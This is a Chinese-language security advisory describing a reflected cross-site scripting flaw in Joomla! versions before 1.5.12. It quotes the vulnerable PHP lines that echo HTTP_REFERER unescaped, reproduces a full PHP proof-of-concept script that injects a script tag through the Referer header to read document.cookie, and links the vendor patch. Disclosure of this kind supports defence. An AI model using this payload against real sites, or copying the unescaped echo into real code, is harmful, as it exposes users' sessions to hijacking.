受影响系统:
Open Source Matters Joomla! < 1.5.12
不受影响系统:
Open Source Matters Joomla! 1.5.12
描述:
BUGTRAQ ID: 35544
Joomla!是一款开放源码的内容管理系统(CMS)。
Joomla!没有正确地过滤用户在HTTP请求中所提交的HTTP_REFERER变量,远程攻击者可以通过提交恶意请求注入JavaScript或DHTML代码并在用户浏览器会话中执行。以下是有漏洞的代码段:
components/com_content/views/article/tmpl/form.php文件225行
221 <input type="hidden" name="option" value="com_content" />
222 <input type="hidden" name="id" value="<?php echo
$this->article->id; ?>" />
223 <input type="hidden" name="version" value="<?php echo
$this->article->version; ?>" />
224 <input type="hidden" name="created_by" value="<?php echo
$this->article->created_by; ?>" />
225 <input type="hidden" name="referer" value="<?php echo
@$_SERVER[‘HTTP_REFERER’]; ?>" />
226 <?php echo JHTML::_( ‘form.token’ ); ?>
227 <input type="hidden" name="task" value="" />
228 </form>
代码的其他一些部分也可能受影响:
components/com_user/controller.php文件86行
$return = @$_SERVER[‘HTTP_REFERER’];
plugins/system/legacy/html.php文件246行
echo ‘<a href="’. $_SERVER[‘HTTP_REFERER’] .’"><span class="small">’. JText::_( ‘BACK’ ) .'</span></a>’;
templates/beez/html/com_content/article/form.php文件186行
<input type="hidden" name="referer" value="<?php echo @$_SERVER[‘HTTP_REFERER’]; ?>" />
<*来源:Juan Galiana Lara (jgaliana@isecauditors.com)
链接:http://marc.info/?l=bugtraq&m=124655389716111&w=2
*>
测试方法:
<?php
/* PoC: XSS Joomla 1.5.11
Juan Galiana Lara
Internet Security Auditors
Jun 2009
*/
/* config */
$site=’localhost’;
$path=’/joomla-1.5.11′;
$cookname=’d85558a8cf943386aaa374896bfd3d99′;
$cookvalue=’4ab56fdd83bcad86289726aead602699′;
class cURL {
var $headers;
var $user_agent;
var $compression;
var $cookie_file;
var $proxy;
/* evil script */
var $xss=’alert("PWN PWN PWN: " + document.cookie);’;
function
cURL($cookies=TRUE,$cookie=’cookies.txt’,$compression=’gzip’,$proxy=”) {
$this->headers[] = ‘Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8′;
$this->headers[] = ‘Connection: Keep-Alive’;
$this->headers[] = ‘Content-type:
application/x-www-form-urlencoded;charset=UTF-8′;
$this->headers[] = ‘Referer: "><script>’ . $this->xss
.'</script><span a="’;
$this->user_agent = ‘Mozilla/4.0 (compatible; MSIE 7.0; Windows NT
5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)’;
$this->compression=$compression;
$this->proxy=$proxy;
$this->cookies=$cookies;
if ($this->cookies == TRUE) $this->cookie($cookie);
}
function cookie($cookie_file) {
if (file_exists($cookie_file)) {
$this->cookie_file=$cookie_file;
} else {
fopen($cookie_file,’w’) or $this->error(‘The cookie file could
not be opened. Check permissions’);
$this->cookie_file=$cookie_file;
fclose($this->cookie_file);
}
}
function get($url) {
$process = curl_init($url);
curl_setopt($process, CURLOPT_HTTPHEADER, $this->headers);
curl_setopt($process, CURLOPT_HEADER, 0);
curl_setopt($process, CURLOPT_USERAGENT, $this->user_agent);
if ($this->cookies == TRUE) curl_setopt($process,
CURLOPT_COOKIEFILE, $this->cookie_file);
if ($this->cookies == TRUE) curl_setopt($process,
CURLOPT_COOKIEJAR, $this->cookie_file);
curl_setopt($process,CURLOPT_ENCODING , $this->compression);
curl_setopt($process, CURLOPT_TIMEOUT, 30);
if ($this->proxy) curl_setopt($cUrl, CURLOPT_PROXY,
‘proxy_ip:proxy_port’);
curl_setopt($process, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($process, CURLOPT_FOLLOWLOCATION, 1);
$return = curl_exec($process);
curl_close($process);
return $return;
}
function error($error) {
echo $error;
die;
}
}
/* set cookie */
$f=fopen("cookies.txt","w");
fwrite($f,"localhost\tFALSE\t/\tFALSE\t0\t$cookname\t$cookvalue\n");
fclose($f);
/* do request */
$cc = new cURL();
$c=$cc->get(‘http://’ . $site . $path .
‘/index.php?option=com_content&view=article&layout=form’);
/* let’s execute some javascript.. }:-)*/
echo $c;
?>
建议:
厂商补丁:
Open Source Matters
——————-
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
http://www.joomla.org/announcements/release-news/5242-joomla-1512-released.html
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
0 条评论。